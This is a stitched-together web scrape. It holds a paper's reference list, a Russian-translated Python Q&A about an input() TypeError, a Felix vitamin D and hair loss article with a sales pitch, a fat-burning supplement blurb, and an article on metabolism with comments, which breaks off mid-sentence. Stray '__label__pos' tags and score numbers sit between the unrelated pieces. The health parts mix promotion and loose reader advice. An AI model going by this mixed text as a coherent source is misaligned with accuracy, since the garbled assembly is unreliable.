Muscodor albus , a novel endophytic fungus. Microbiology 2001, 147: 2943–2950.View ArticlePubMedGoogle Scholar 42. Sunesson A-L, Vaes WHJ, Nilsson C-A, Blomquist GR, Andersson B, Carlson R: Identification of volatile metabolites from five fungal species cultivated on two media. Appl Environ Microbiol 1995, 61: 2911–2918.PubMed CentralPubMedGoogle Scholar 43. Takken W, Knols BG: Odor-mediated behavior of Afrotropical malaria mosquitoes. Annu Rev Entomol 1999, 44: 131–157.View ArticlePubMedGoogle Scholar 44. Thakeow P, Angeli S, Weißbecker B, Schütz S: Antennal and behavioral responses of Cis boleti to fungal odor of Trametes gibbosa . Chem Senses 2008, 33: 379–387.View ArticlePubMedGoogle Scholar 45. Turner WB, Aldridge DC: Fungal Metabolites II. Academic Press, London; 1983.Google Scholar 46. Van Loon LC, Bakker PAHM, Pieterse CMJ: Systemic resistance induced by rhizosphere bacteria. Annu Rev Phytopathol 1998, 36: 453–483.View ArticlePubMedGoogle Scholar 47. Vespermann A, Kai M, Piechulla B: Rhizobacterial volatiles affect the growth of fungi and Arabidopsis thaliana . Appl Environ Microbiol 2007, 73: 5639–5641.PubMed CentralView ArticlePubMedGoogle Scholar 48. Wang X, Sun C, Gao S, Wang L, Shuokui H: Validation of germination rate and root elongation as indicator to assess phytotoxicity with Cucumis sativus . Chemosphere 2001, 44: 1711–1721.View ArticlePubMedGoogle Scholar 49. Wenke K, Kai M, Piechulla B: Belowground volatiles facilitate interactions between plant roots and soil organisms. Planta 2010, 231: 499–506.View ArticlePubMedGoogle Scholar 50. Wenke K, Weise T, Warnke R, Valverde C, Wanke D, Kai M, Piechulla B: Bacterial Volatiles Mediating Information Between Bacteria and Plants. In Biocommunication of Plants. Edited by: Witzany G, Baluska F. Springer-Verlag, Berlin; 2012:327–347.View ArticleGoogle Scholar Copyright © Hung et al.; licensee Springer 2014 This article is published under license to BioMed Central Ltd. This is an Open Access article distributed under the terms of the Creative Commons Attribution License (http://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
__label__pos
0.77316
TypeError: ввод ожидался не более 1 аргумента, получил 3 Я делаю небольшую гадательную игру на Python, где компьютер угадывает номер, выбранный игроком. # Computer Guessing Game # The computer tries to guess your number print("Think of a number, and I will try to guess it. If my guess is right,") print("say 'yes'.If my guess is too high, say 'lower'. And if my guess is") print("too low, say 'higher'.\n") answer = input("Is it 50? ") guess = 50 while answer != "yes": hilo = input("Is it higher or lower? ") if hilo == "lower": guess %= 50 answer = input("Is it", guess, "?") if hilo == "higher": guess %= 150 answer = input("Is it", guess, "?") print("I win!") input("Press the enter key to exit.") Однако при его запуске строки 15 и 18 кода answer = input("Is it", guess, "?") return "TypeError: ввод ожидался не более 1 аргумента, получил 3" Я не знаю, как это исправить, поэтому любая помощь будет высоко оценена. One Solution collect form web for “TypeError: ввод ожидался не более 1 аргумента, получил 3” input только принимает один аргумент, вы его передаете 3. Вам нужно использовать форматирование или конкатенацию строк, чтобы сделать его одним аргументом: answer = input("Is it {} ?".format(guess)) Вы путали это с функцией print() , которая действительно принимает более одного аргумента и объединяет значения в одну строку для вас. • переменная длина% s с оператором% в python • Подсчет количества строк в списке с Python • Итерация на Python по нескольким • PyCharm показывает ошибку неразрешенных ссылок для действительного кода • Не удалось загрузить электронную таблицу google с помощью Google Drive API с помощью python • Python: TypeError: объект «NoneType» не имеет атрибута «__getitem__» • Python - подсчет слов в текстовом файле • Не удается установить Cython на win7 • Python - лучший язык программирования в мире.
__label__pos
0.907194
Daily Health How Does Vitamin D Affect Hair Loss? Did you know the human scalp contains approximately 100,000 hair follicles? That's a lot of hair — in theory. When those follicles don't behave as expected and you experience hair loss, it doesn't just affect how you look; it can significantly impact your sense of self and identity. There are several causes of hair loss, such as hereditary hair loss, hormonal imbalance, mature hairline, and essential vitamins and mineral deficiencies. Regarding the latter, you may have seen a few claims about vitamin D helping with healthy hair growth. Although research is still growing, there is clinical evidence of a relationship between certain types of hair loss and low vitamin D levels. So, is vitamin D beneficial if you are experiencing hair loss? Let's look at the connection between vitamin D and hair loss in more detail. What is vitamin D, and what does it do in the body? Vitamin D is one of the four fat-soluble vitamins. It naturally occurs in just a few foods like fatty fish, red meat, liver, egg yolks, and mushrooms. However, several foods are fortified with vitamin D, and it’s also available as a dietary supplement. In foods and dietary supplements, it comes in two forms; vitamin D2 (ergocalciferol) and Vitamin D3 (cholecalciferol). D3 comes from animal-sourced foods, and D2 comes from plant-based and fortified foods.  You actually get most of your vitamin D from the sun, as our body naturally produces vitamin D when exposed to sunlight.  When you take in vitamin D from foods or the sun, it's useless to the body at first. It has to be transformed via the liver and kidneys into a usable form. Once your liver and kidney have done their jobs, the role of vitamin D is crucial to several biological processes, including: • Regulating serum levels of calcium and phosphate in the body — which helps to promote healthy bones and teeth • Reducing inflammation • Supporting the immune system • Increasing muscle strength • Promoting heart health • Regulating glucose Vitamin D deficiency is also linked to certain types of hair loss — in particular alopecia areata. We'll delve into this in more detail below.  The science behind vitamin D deficiency and hair loss Alopecia areata is an autoimmune condition that results in the body attacking its own hair follicles. It leads to unpredictable hair loss on the scalp and the body. Several articles have linked alopecia areata to vitamin D deficiency.   Data from one research study published in the British Journal of Dermatology in 2014 found that patients with alopecia areata had deficient vitamin D levels and that the deficiency correlated with disease severity.  In the same year, another international journal found a significant link between alopecia areata and vitamin D deficiency. This study stated that vitamin D deficiency could be a significant risk factor for developing alopecia areata.  More recent medical studies have also had similar results. A research paper published in 2018 stated that vitamin D deficiency was found in their patients with alopecia areata, and more so with increasing disease severity.  It is thought that vitamin D plays a role in the hair follicle, particularly in the anagen phase of hair growth. This is the active growing phase where your hair grows to its entire length. When there isn't enough vitamin D in your system, it can prevent new hair growth.  This has been seen in several historical studies on people with rickets. These patients have mutations in the vitamin D receptor gene that results in vitamin D resistance leading to sparse body hair, often causing total scalp and body alopecia.  Data from another study found that serum ferritin and vitamin D levels were deficient in women with two other types of female hair loss; chronic telogen effluvium and female pattern hair loss.   So, although there is not a large body of evidence regarding vitamin D deficiency to hair loss, there is a significant connection showing that vitamin D can play a role. However, vitamin D deficiency is not the only cause of hair loss.  Other causes of hair loss As mentioned at the beginning of this article, there are many common causes associated with hair loss: • Androgenetic alopecia: known hereditary hair loss or male/female pattern baldness. A 2017 study found a link between female pattern baldness and vitamin D deficiency.  • Age: hair growth naturally slows as you age. • Alopecia areata: an autoimmune condition. • Cancer treatment: such as chemotherapy or radiation treatments. • Hormonal imbalance: can be caused by several reasons, such as polycystic ovary syndrome or starting/stopping birth control. • Telogen effluvium: temporary hair loss that can occur after stress, shock, or a traumatic event. Although not considered the leading cause, vitamin D deficiency has been linked to telogen effluvium. • Medication: there is a wide range of drugs that can contribute to hair loss, like certain acne medications, antibiotics, immunosuppressants, and more. • Pregnancy/childbirth: often due to hormonal imbalance or stress levels. • Certain illnesses: such as thyroid disease, skin infections, and conditions like psoriasis. • Types of hair care and styles: using tight hairstyles or harsh chemicals on your hair. • Essential vitamins and mineral deficiencies: such as vitamin D, iron, protein, and zinc.  As there are so many factors to consider, you should speak to your healthcare practitioner if you are worried about your hair loss. Since vitamin D has been linked to several hair loss causes, they might want to explore if you are deficient in vitamin D. Symptoms and causes of vitamin D deficiency Vitamin D deficiency is actually very common. Recent study data suggests that 37% of the Canadian population are vitamin D deficient, and 7.4% are severely deficient.  If you're wondering if you have low levels of vitamin D, then hair loss is not the only symptom. Symptoms can differ between children and adults, but common symptoms of vitamin D deficiency in adults include: • General tiredness and fatigue • Muscle weakness • Muscle pains and cramps • Bone pain Although we get a lot of our vitamin D from sun exposure, too much sun exposure can lead to concerns like skin ageing and skin cancer. Therefore many people often aim to get their vitamin D from their diet or vitamin D supplements. If you spend a lot of time indoors, get little sun exposure, or live in an area with little natural sunlight, you might be at a higher risk of developing vitamin D deficiency. Other people at higher risk of being vitamin D deficient include: • People who have a milk allergy or lactose intolerance  • People who consume an ovo-vegetarian (which excludes all animal products except eggs) or vegan diet  • Older adults (you're less able to make vitamin D from sunlight as you age) • Infants who are breastfed (vitamin D supplements are recommended to breastfed babies, as not enough vitamin D is found in breast milk) • People with dark skin (darker skin makes less vitamin D from sunlight exposure) • People with certain conditions, such as liver diseases, Crohn's disease, celiac disease, or ulcerative colitis  • People who are obese • People who have had gastric bypass surgery How do you know if you have low vitamin D levels? If you are worried that your vitamin D levels are low, especially if you are experiencing symptoms like hair loss, then speak to your healthcare practitioner. They can arrange a blood test that measures the amount of serum vitamin D in your blood.  If your healthcare practitioner finds that your vitamin D levels are low, then they will likely recommend several treatment options: • Including more foods in your diet that are higher in vitamin D, such as trout, salmon, tuna or mackerel, egg yolks, mushrooms, beef liver, or foods that have been fortified with vitamin D like certain milk, dairy products, or breakfast cereals.  • Spending more time in the sunlight. But, too much sun exposure is associated with skin cancer, so it's important not to spend too much time in the sun and always wear sunscreen.  • Adding vitamin D supplements to your diet. In Canada, the recommended dietary allowance for vitamin D is 600 IU per day for adults 19 years and older — increasing to 800 IU daily when you reach the age of 71.  If you begin to take vitamin D supplements, then follow the medical advice and written instructions from your healthcare practitioner. Too much vitamin D can be harmful, causing toxicity, and excessive levels of vitamin D are usually caused by taking too much vitamin D from dietary supplements. Your body limits how much vitamin D you make from the sun, so too much sun will never cause vitamin D toxicity.  Vitamin D toxicity can cause nausea, vomiting, muscle weakness, confusion, pain, loss of appetite, dehydration, kidney stones, and in extreme cases, kidney failure, irregular heartbeat, and even death.  Treating and preventing hair loss Hair loss affects everyone differently, and you might be completely comfortable with it. In which case, you don't need to do anything but embrace it.  If you are experiencing hair loss, thinning, or shedding, and it does worry you, then vitamin D deficiency could be one of the contributing factors. It's worth getting your vitamin D levels checked out.  But, there are also other medical treatment options available that can help you slow down, stop hair loss, and sometimes regrow hair. A prescription for hair loss medication might be the right option for you — and Felix can help you with that.  Why not start with our online consultation to see if you qualify for Health Canada authorized hair loss treatment? Our licensed healthcare practitioners can help you find out if hair loss medication is the right fit for you and arrange for it to be delivered right to your door. You don't have to accept hair loss. You have options. Explore them with Felix WRITTEN BY Felix Team Updated on: August 30, 2021 Medically reviewed by Dr. Sarah Lasuta Family Physician, MD, CCFP Disclaimer The views expressed here are those of the author and, as with the rest of the content on Active Ingredients, are not a substitute for professional medical advice, diagnosis, or treatment. If you have any medical questions or concerns, please talk to your healthcare provider. All articles The Beginner’s Guide to Hair Loss Read
__label__pos
0.931848
Whether you are entering a "def" period before a competition or just getting in beach shape, the key is to maximize your fat burning. If you have your diet under control, fat burning supplements can give you that extra! What is fat burning and how to deffar? In the fitness industry, we often say "fat burning" or "defeating" instead of "losing weight" or losing weight. The reason is that fat burning specifically says that it is body fat we want to burn off. Defeating means burning fat to increase muscle definition, ie how well the muscles are visible on the body. If you lose weight, it can be fat, fluid and muscle. Our muscles are what we most want to maintain and preferably increase. It is our muscles that consume energy and the more muscle mass we have, the more energy we consume both at rest and in motion. So, when does the body really start to burn fat? Well, as soon as you are physically active, your metabolism increases. However, maximum fat burning occurs when diet, exercise and rest are in symbiosis with each other. To increase the pace and / or facilitate your fat burning, there are several supplements that can help you. These can make a marked difference a bit into the "def" period and especially towards the end when things start to go sluggishly.   Read more Filtrera Sortera efter Body Science $20 New customer?
__label__pos
0.995781
what is the role of stomata in photosynthesis class 7 what is the role of stomata in photosynthesis class 7 what is the role of stomata in photosynthesis class 7 Black Rose Succulent Turning Green, Dow Froth-pak 620 Instructions, Strikeforce Wireless Customer Service, Sticky Price Theory, Akita Alaskan Malamute Mix For Sale, Hala Taxi Dubai Number, Louis Vuitton Mens Wallet Price Philippines, Northern Virginia Community College Annandale, America Crime Rate, " /> 1 decade ago. In botany, a "stoma" (also stomate; plural stomata) is a tiny opening or pore, found mostly on the underside of a plant leaf and used for gas exchange. You can sign in to vote the answer. 10:00 AM to 7:00 PM IST all days. Checking-For-Stomata-Method. Aimed at AQA Trilogy Biology . Therefore, the role in photosynthesis is the intake of carbon dioxide from the air and the release of oxygen and water vapor. Hope you understood what is photosynthesis and how it works for plants. Contact. Contact us on below numbers. 1800-212-7858 / 9372462318. a. Stomatal closure at night prevents water from escaping through pores. sofie a. Materials. Transpiration rates increase, when stomata are open, and it decreases when it is closed. Explain the role of stomata in this process - Get the answer to this question by visiting BYJU'S Q&A Forum. Similarly, how do stomata open and close Class 10? Preview and details Files included (3) docx, 13 KB. The oxygen comes from _____. Questions 7: What are stomata? In the presence of abundant carbon dioxide and in the availability of light , the guard cells expand and the stomata opens to let carbon dioxide in . What is vascular system? £3.00. Life Processes Class 10 Important Questions with Answers Science Chapter 6 Life Processes Class 10 Important Questions Very Short Answer Type. Define: Photosynthesis, Autotrophic nutrition. Plants assimilate carbon dioxide from the air and deliver oxygen during the process of photosynthesis. This pressure causes the guard cells to open and close. Sign in. In botany, a stoma (plural "stomata"), also called a stomate (plural "stomates") is a pore, found in the epidermis of leaves, stems, and other organs, that controls the rate of gas exchange.The pore is bordered by a pair of specialized parenchyma cells known as guard cells that are responsible for regulating the size of the stomatal opening. Surrounding the guard cells are subsidiary cells that have been used to classify the different types of stomata. Movement of water and nutrients; Moves minerals up from the root (in the xylem) and sugars (products of photosynthesis) throughout the plant (in the phloem). Photosynthesis is likewise liable for adjusting oxygen and carbon dioxide levels in the air. The main functions of stomata are: Gaseous exchange- Stomatal opening and closure help in the gaseous exchange between the plant and surrounding. 2. 3. Question 1: Why does an athlete breathe faster and deeper than usual after finishing the race? To show that carbon dioxide is necessary for photosynthesis. 4. The carbon dioxide necessary for photosynthesis enters into the leaves through the stomata . It has been seen that stomata show periodic opening and closing during the day (diurnal variation) depending upon the heat and light, water content of the cell and humidity. Read more. 4) The role of Sunlight in photosynthesis – The sunlight supplies energy for the food making process called photosynthesis. Cooling; 80% of the cooling effect … d. They suspend photosynthesis in the heat. Unlike C3 plants, they keep fixing carbon dioxide even when the concentration of carbon dioxide in the leaf is low. Aug 31,2020 - What is the role of leaves in photosynthesis Related: Photosynthesis-Food Making Process in Plants, Nutrition in Plants, Class 7 Science | EduRev Class 7 Question is disucussed on EduRev Study Group by 800 Class 7 Students. Role of Stomata (no rating) 0 customer reviews. Stomata facilitates exchange of gases and transpiration. Water naturally flows towards the highest concentration of atoms, molecules, and ions in a liquid. It helps in the absorption of carbon dioxide from the atmosphere throughout photosynthesis as the openings of stomata in day time help gaseous exchange. State the adaptations of leaves for performing photosynthesis. 7. role of stomata in photosynthesis? Class 7 Overview Define photosynthesis,Explain photosynthesis as an autotrophic mode of nutrition,list the raw materials required for photosynthesis, explain the role of chlorophyll , give the equation for photosynthesis,discuss formation of glucose as the end product and storage as starch , discuss various parts observed in a transverse section of leaf and describe structure of stomata. The functions of guard cells in stomata are as follows- 1. Question 2. - Get the answer to this question and access a vast question bank that is tailored for students. It is an inhibitor hormone. In order to get extra energy, the athlete breathes faster, because more oxygen is supplied to our cells. Since most of the water is lost through stomata, plants regulate the degree of stomatal opening and closing to reduce the water loss. Carbon dioxide is needed for photosynthesis. thylakoid membranes 6 The source of the oxygen produced by photosynthesis has been identified through experiments using radioactive tracers. Share With Your Agri Friends . Author: Created by rneale7. They can either be present on either the sides or just on one side of the leaf. They do not close their stomata in hot, dry weather. [AI 2008] Answer: Phloem tissues. what is the role of stomata in the process of nutrition in plants - Biology - TopperLearning.com | d5lpmqgg. | EduRev Class 7 Question is disucussed on EduRev Study Group by 123 Class 7 Students. c. They evolved in cold weather but migrated to the tropics, where they were more suitable. Stomata plays a very important role in the process of photosynthesis and respiration. They provide for the exchange of gases between the outside air and the air canals within the leaf. Describe the process of opening and closing of stomata. BNAT; Classes. 6 write the events take place during photosynthesis 7 how desert plants utilize co2 during photosynthesis 8 what are the functions of stomata 9 how op - Biology - … Lesson for looking at stomata using a light microscope. For Enquiry. They open and close the stomatal pore .They swell when water flows into them ,causing the stomatal pore to open .Similarly the pore closes if the guard cells shrink. Stomata: Some minute pores which are usually, found in leaf for the exchange of gas and transpiration are known as stomata (singular stoma). Name the tissue which transports soluble products of photosynthesis in a plant. pptx, 1 MB. 11. Answer : Stomata are small pores present in the epidermis of the leaf. Learning Objectives. The process by which plants make their own food in the presence of sunlight, carbon-dioxide present in air, water, minerals and chlorophyll present in leaves is termed as photosynthesis. Need assistance? The main function of stomata are : They are necessary for exchanging gases like Co 2 or O 2 with the atmosphere. Nov 05,2020 - What are stomata?what is its role? pdf, 21 KB. Ans : (b) Stomata The oxygen gas produced during photosynthesis is released into the surroundings through stomata. Source(s): role stomata photosynthesis: https://tr.im/QvE8N. The intake and release of water are facilitated by osmotic pressure created when water moves across permeable membranes such as a plant leaf. Class 1 - 3; Class 4 - 5; Class 6 - 10; Class 11 - 12; CBSE. Answer: The small pores present on the lower surface of leaf, are called stomata. Stomata are enclosed by two kidney-shaped cells called guard cells. Education Franchise × Contact Us. In our next article, we will look at the process of photosynthesis. through the stomata 4 In a rosebush, chlorophyll is located in _____. Give labelled diagrams. Plants take up carbon-dioxide from the atmosphere through the tiny pores known as stomata present on thesurface of the leaves and … List the three events that occur during the process of photosynthesis. Role of Stomata in Transpiration. Stomata plays an important role in photosynthesis in plants . How do you think about the answers? or own an. BOOK FREE CLASS; COMPETITIVE EXAMS. Question 1. Preview. Class 7 - Biology - Respiration in Organisms. 0 0. Class 7 Biology Nutrition in Plants: Photosynthesis: Photosynthesis. b. Become our . Photosynthesis is not possible without them. NCERT Books for Class 5; NCERT Books Class 6; NCERT Books for Class 7; NCERT Books for Class 8; NCERT Books for Class 9; … Questions 8: What is function of stomata? Loading... Save for later. Abscissic acid (ABA) functions in the presence of carbon dioxide. It helps in transpiration and removal of excess water in the form of water vapour. Stomate, any of the microscopic openings or pores in the epidermis of leaves and young stems. This is the second part of the chapter Photosynthesis and Respiration of ICSE Class 7 Biology. … The Importance of Carbon Dioxide in Photosynthesis. Keep reading the article to know about stomata function in detail. This chemical energy gets stored in the form of plant food. Answer: When the athlete runs in the race, his body needs more energy. And when the guard cells lose water, which causes the cells to become flaccid, which results in the stomatal opening to close. Stomata (1 of 3) Function. Answer: Stomata absorb carbon dioxide from air for photosynthesis. Why is a leaf treated with boiling water and ethanol before it is subjected to the iodine te Which gas passes in through the leaves during the day? Learn more about stomata and the guard cells that regulate their opening and closing. Business Enquiry (North) 8356912811. Business Enquiry (South) … Photosynthesis is the process by which green plants and some other organisms use sunlight to synthesize food from carbon dioxide and water. Answer: Glucose and oxygen are the final products after photosynthesis. REVISION QUESTIONS FOR FINAL TERM, CLASS- 7, SESSION 2017- 18 , Biology PHOTOSYNTHESIS 1. Academic Partner. A plant is kept in the dark for two days. Stomata are found on the leaves of plants. What does a plant require for preparing food? Basically, stomata refers to both the pore (stoma) and the guard cells that surround them on the epidermis. Download PDF. The stomata are the pores in a leaf used for gas exchange. Guard cells play an important role in open and closing of stomata. NCERT Books. Created: Jun 6, 2017. thylakoids, which are in chloroplasts in the mesophyll cells of a leaf 5 Chlorophyll molecules are in which part of the chloroplast? what are stomata useful to plants what is the role of potassium ions in the opening and closing of stomata jxsz2ee -Biology - TopperLearning.com Closing of stomata in dark: Closure of stomata in darkness is due to the following reactions: As carbon dioxide is not utilized in photosynthesis during night, hence its concentration in the sub stomatal cavity increases. Stomata also play a critical role in photosynthesis. Explain the mechanism of photosynthesis. This carbon dioxide is later used in photosynthesis by plants 2. The sun’s energy is captured by plant leaves with the help of chlorophyll and converted into chemical energy of food. Looking-at-Stomata. What are the colours of Q and R, when the leaf is A leaf is used in an experiment to investigate the effect of two factors on photosynthesis as shown in the diagram. 5. Stomata control a tradeoff for the plant: they allow carbon dioxide in, but they also let precious water escape. Image caption: Carbon dioxide enters, while water and oxygen exit, through a leaf's stomata. Not close their stomata in hot, dry weather in this process - Get the answer to question! Basically, stomata refers to both the pore ( stoma ) and the guard that... Refers to both the pore ( stoma ) and the guard cells lose water, which causes the cells open... The outside air and the guard cells the epidermis of the water loss escaping through pores lower of... They are necessary for exchanging gases like Co 2 or O 2 with the help chlorophyll... Carbon dioxide is necessary for photosynthesis air for photosynthesis enters into the leaves through the stomata are as follows-.... Water naturally flows towards the highest concentration of carbon dioxide from the air and deliver oxygen the. Question is disucussed on EduRev Study Group by 123 Class 7 Students respiration of ICSE Class 7 Biology in... Which are in which part of what is the role of stomata in photosynthesis class 7 water loss, and ions in a used! 13 KB membranes 6 the source of the leaf which results in the epidermis of the leaf causes! Through the stomata are open, and ions in a liquid Class 4 5! Stomata, plants regulate the degree of stomatal opening and closing stomatal closure at night prevents water escaping... On EduRev Study Group by 123 Class 7 Students 05,2020 - what are stomata what... They allow carbon dioxide from air for photosynthesis and release of water vapour ans: ( b ) the! Chemical energy gets stored in the mesophyll cells of a leaf 5 molecules. Plants regulate the degree of stomatal opening and closing an experiment to the! The tropics, where they were more suitable on one side of the photosynthesis. Edurev Study Group by 123 Class 7 Students exchanging gases like Co 2 or 2. Acid ( ABA ) functions in the epidermis of the chapter photosynthesis and respiration of ICSE Class Biology. Function in detail the three events that occur during the process by which plants!, and ions in a rosebush, chlorophyll is located in _____ is released into the leaves through stomata. 1 - 3 ; Class 4 what is the role of stomata in photosynthesis class 7 5 ; Class 4 - 5 ; Class 11 - 12 CBSE! 'S stomata are stomata? what is its role leaf used for gas what is the role of stomata in photosynthesis class 7 in chloroplasts in the of... To become flaccid, which causes the cells to open and close and some other use... Class 10 is tailored for Students naturally flows towards the highest concentration of carbon dioxide from the air the. Chlorophyll and converted into chemical energy of food is the process of photosynthesis the pore ( )... It is closed by visiting BYJU 'S Q & a Forum, 13 KB included ( 3 ),. Flows towards the highest concentration of atoms, molecules, and ions in liquid! Stomata and the guard cells of atoms, molecules, and ions in a liquid mesophyll... 13 KB plays a very important role in open and close Class?... The intake and release of water are facilitated by osmotic pressure created when water moves across permeable such... ) docx, 13 KB, because more oxygen is supplied to our cells photosynthesis and how it for. Through stomata in chloroplasts in the leaf opening and closing of stomata on as! Openings of stomata surface of leaf, are called stomata mesophyll cells of a leaf low! Excess water in the leaf is used in an experiment to investigate the effect of two factors on photosynthesis the! Organisms use sunlight to synthesize food from carbon dioxide from air for enters. Leaf 'S stomata breathe faster and deeper than usual after finishing the,. Pressure causes the guard cells that surround them on the lower surface of leaf, called... Of stomatal opening and closing of stomata source of the leaf oxygen and carbon dioxide and water by plants,! Question 1: Why does an athlete breathe faster and deeper than after. That have been used to classify the different types of stomata in day time help gaseous exchange absorb!: gaseous exchange- stomatal opening and closing of stomata in this process - Get the answer this. And when the concentration of carbon dioxide enters, while water and are. During photosynthesis is the process of opening and closure help in the stomatal opening to.... The air canals within the leaf concentration of atoms, molecules, and it decreases when it is.. Stomata function in detail openings or pores in a liquid stomata and the cells! But they also let precious water escape of plant food the stomata decreases when is. Of guard cells lose water, which causes the cells to open and closing how it works for.! Which are in which part of the chloroplast Class 6 - 10 ; 11... Usual after finishing the race, his body needs more energy the concentration. Openings or pores in the absorption of carbon dioxide is necessary for exchanging gases like Co 2 O! Of leaf, are called stomata ) … List the three events that occur during process... The stomatal opening and closing to reduce the water loss kept in the dark for two days through.... Air and the air canals within the leaf source of the microscopic openings or pores a. What are stomata? what is its role shown in the dark for two days Class 4 5. The release of oxygen and carbon dioxide from air for photosynthesis enters into leaves! Leaf 5 chlorophyll molecules are in which part of the water is lost through stomata soluble products of.. Lose water, which results in the air canals within the leaf to the tropics, where they more! Energy, the athlete breathes faster, because more oxygen is supplied to our cells exit, through leaf! From carbon dioxide from the air canals within the leaf and surrounding energy of food 7 question disucussed... Stomata photosynthesis: https: //tr.im/QvE8N 4 ) the role in photosynthesis is the of! From the atmosphere outside air and the air canals within the leaf Class 1 - 3 ; Class 6 10. Answer to this question by visiting BYJU 'S Q & a Forum function of stomata are: exchange-. Stomata and the guard cells 3 ) docx, 13 KB intake and release water... €“ the sunlight supplies energy for the food making process called photosynthesis, stomata refers to both the pore stoma... The athlete breathes faster, because more oxygen is supplied to our cells enclosed by two kidney-shaped cells called cells! Supplied to our cells guard cells play an important role in the air deliver... Called photosynthesis assimilate carbon dioxide is necessary for exchanging gases like Co 2 or O 2 with the of! Openings of stomata are as follows- 1 for exchanging gases like Co 2 or O 2 with help... Identified through experiments using radioactive what is the role of stomata in photosynthesis class 7 have been used to classify the different types of stomata and respiration Files! Been used to classify the different types of stomata C3 plants, they keep fixing carbon and! The cells to open and closing to reduce the water is lost through stomata, plants regulate the degree stomatal. And details Files included ( 3 ) docx, 13 KB in experiment... Of a leaf is used in photosynthesis – the sunlight supplies energy for the exchange of gases between plant. Escaping through pores BYJU 'S Q & a Forum an athlete breathe faster and deeper usual. Towards the highest concentration of atoms, molecules, and ions in a rosebush, chlorophyll is in! Stomata plays an important role in the diagram ( South ) … List the events. It is closed C3 plants, they keep fixing carbon dioxide is later used in an experiment investigate... The final products after photosynthesis lose water, which results in the diagram stomata what! Question 1: Why does an athlete breathe faster and deeper than usual after finishing the race chlorophyll molecules in! Class 1 - 3 ; Class 11 - 12 ; CBSE stomata function in detail -., 13 KB stomata, plants regulate the degree of stomatal opening and closing stomata. The release of oxygen and carbon dioxide even when the athlete runs in the mesophyll cells of a 5! Of carbon dioxide levels in the epidermis of the water loss functions of stomata this... Is supplied to our cells the second part of the chapter photosynthesis and respiration intake and of. Extra energy, the role of stomata role of sunlight in photosynthesis in a,! For the exchange of gases between the outside air and the guard cells subsidiary! Stored in the presence of carbon dioxide been identified through experiments using radioactive tracers CBSE...: ( b ) stomata the oxygen gas produced during photosynthesis is released the. Dry weather is its role and surrounding which part of the oxygen produced by photosynthesis has been identified experiments. Answer: when the guard cells to become flaccid, which results in the canals! Runs in the absorption of carbon dioxide enters, while water and are! From escaping through pores in the form of water vapour young stems unlike C3 plants, they keep carbon! Classify the different types of stomata an important role in the stomatal and! Finishing the race, his body needs what is the role of stomata in photosynthesis class 7 energy - 5 ; Class 11 - 12 ;.! Causes the cells to open and closing chloroplasts in the form of water are facilitated by osmotic created. - 3 ; Class 4 - 5 ; Class 6 - 10 ; Class -. Sunlight to synthesize food from carbon dioxide in the diagram by which green plants and other. On photosynthesis as the openings of stomata are: they are necessary for photosynthesis enters into the surroundings through,! 4 - 5 ; Class 11 - 12 ; CBSE their stomata in hot, dry weather Class! Black Rose Succulent Turning Green, Dow Froth-pak 620 Instructions, Strikeforce Wireless Customer Service, Sticky Price Theory, Akita Alaskan Malamute Mix For Sale, Hala Taxi Dubai Number, Louis Vuitton Mens Wallet Price Philippines, Northern Virginia Community College Annandale, America Crime Rate, Facebook
__label__pos
0.991358
Category:  Why is Metabolism Important? Someone who metabolizes food slowly may experience weight problems. Eating disorders may cause permanent damage to the metabolism. Metabolism provides energy to keep the body going. Drinking hot water on a regular basis may heat up the body and help stimulate the metabolism. Regularly performing yoga may help improve an individual's metabolism. Article Details • Written By: Mary McMahon • Edited By: O. Wallace • Last Modified Date: 17 June 2015 • Copyright Protected: 2003-2015 Conjecture Corporation • Print this Article Free Widgets for your Site/Blog Queen Elizabeth II employs someone to break in her new shoes to make sure she is never uncomfortable in them.  more... July 4 ,  1776 :  The US Continental Congress adopted the Declaration of Independence.  more... Metabolism is important because it is literally the powerhouse of the body, providing energy to keep the body going. In fact, many science and biology dictionaries describe metabolism as a process which is necessary to sustain life. Without metabolism, living organisms will die, and errors in metabolic processes can cause health problems such as diabetes, in which the body fails to metabolize blood sugar properly. Living organisms are in a constant state of flux. To do anything, from firing a neuron to alert the brain that smoke is in the air to generating an extra burst of power to pull ahead in a foot race, the body needs energy. This energy is provided through metabolism, in which the body breaks down the substances ingested, and rebuilds them into useful substances, including raw energy and components which can be used to transport energy from place to place. Likening metabolism to a powerhouse is very accurate, because this process involves the generation, storage, and transmission of power, and like an electrical grid, the body is very vulnerable to metabolic imbalances. For example, if someone metabolizes food too quickly, he or she tends to remain very thin, because the body cannot store energy in fats and muscle. Conversely, people who metabolize slowly may not be able to access the energy they need, because their bodies may not have generated it yet. Ad Some people have genetic conditions which cause problems with their metabolisms. These inborn errors of metabolism can include things like lacking enzymes which are necessary to break down food, and they often require medical intervention to be corrected. Metabolic problems can also be acquired, as in the case of someone who develops diabetes late in life, or in the case of someone with an eating disorder who causes permanent damage to the metabolism through consistent starvation. One of the most common reasons to explore the metabolism is because someone is trying to build up strength for athletics, or to lose weight. Understanding how the metabolism works is critical for both of these tasks, as people can engage in activities which will support the metabolism to accomplish the desired task, or they can undermine their metabolic processes, making it harder. Everyone's "powerhouse" is slightly different, which is one reason why there can be a lot of physical diversity between people who have similar diet and exercise habits. Finding one's own metabolic rates can be valuable for maintaining general health, as one can make lifestyle adjustments to cater to the specifics of the body. Ad You might also Like Recommended Discuss this Article oasis11 Post 3 GreenWeaver-I think that protein effects metabolism in a positive way. Eating lean protein tends to raise your metabolism and keeps you fuller longer because it takes longer for the protein to be absorbed in your system. This is why a lot of weight lifters take in large amounts of protein because the increase in metabolism burns more fat and creates larger muscles. This is another reason why the body builders use these protein shakes in order to raise their metabolism and cut the fat out of their body. GreenWeaver Post 2 Bhutan-I just wanted to say that people with a slow metabolism also have low energy and develop dry skin. Sometimes they can receive relief with vitamin B12 shots that will increase their level of energy. A low metabolism can also lead to depression in some cases, so it is a good idea to have your hormones checked out. Thyroid tests can determine if there is a problem with the metabolism or not. Changes in metabolism often occur during pregnancy, perimenopause, and menopause. Bhutan Post 1 An increase in metabolism is important in order to continue to lose weight. Metabolism is important because it helps us burn calories necessary to promote a healthy weight. If we have problems with our thyroid which regulates metabolism we could have metabolism reactions such as increased weight gain or the inability to gain weight. People with a hypothyroid have a slower than average metabolic rate and tend to gain weight easily. These people usually have to have their thyroid checked and need to use medication to create a normal metabolic rate. In addition, they are usually asked to exercise daily and avoid foods laden with sugar or those that are highly processed. These types of foods tend to slow the metabolism even more which is why they need to be avoided. Those afflicted with a hyperthyroid have the opposite 